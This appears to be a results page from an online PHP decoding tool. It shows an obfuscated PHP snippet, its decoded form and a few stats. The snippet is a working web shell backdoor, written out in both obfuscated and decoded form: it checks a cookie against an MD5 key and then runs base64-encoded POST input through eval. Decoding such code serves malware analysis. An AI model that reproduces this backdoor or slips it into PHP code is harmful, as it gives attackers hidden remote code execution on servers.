Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $key = "e3e6ab8e3465a2f099ce4d148607dd17"; $a94eec34="\142\x61\163\x65\66\64\137\..
Decoded Output download
if(md5($_COOKIE['key']) == $key) { eval (base64_decode($_POST["code"])); }
Did this file decode correctly?
Original Code
<?php $key = "e3e6ab8e3465a2f099ce4d148607dd17"; $a94eec34="\142\x61\163\x65\66\64\137\144\x65\x63\x6f\x64\145";@eval($a94eec34($a94eec34("YVdZb2JXUTFLQ1JmUTA5UFMwbEZXeWRyWlhrblhTa2dQVDBnSkd0bGVTa2dleUJsZG1Gc0lDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVFOVRWRnNpWTI5a1pTSmRLU2s3SUgwPQ=="))); ?>
Function Calls
| base64_decode | 2 |
Stats
| MD5 | 3acc38a41da8e50cd41af0b5beac2adb |
| Eval Count | 1 |
| Decode Time | 78 ms |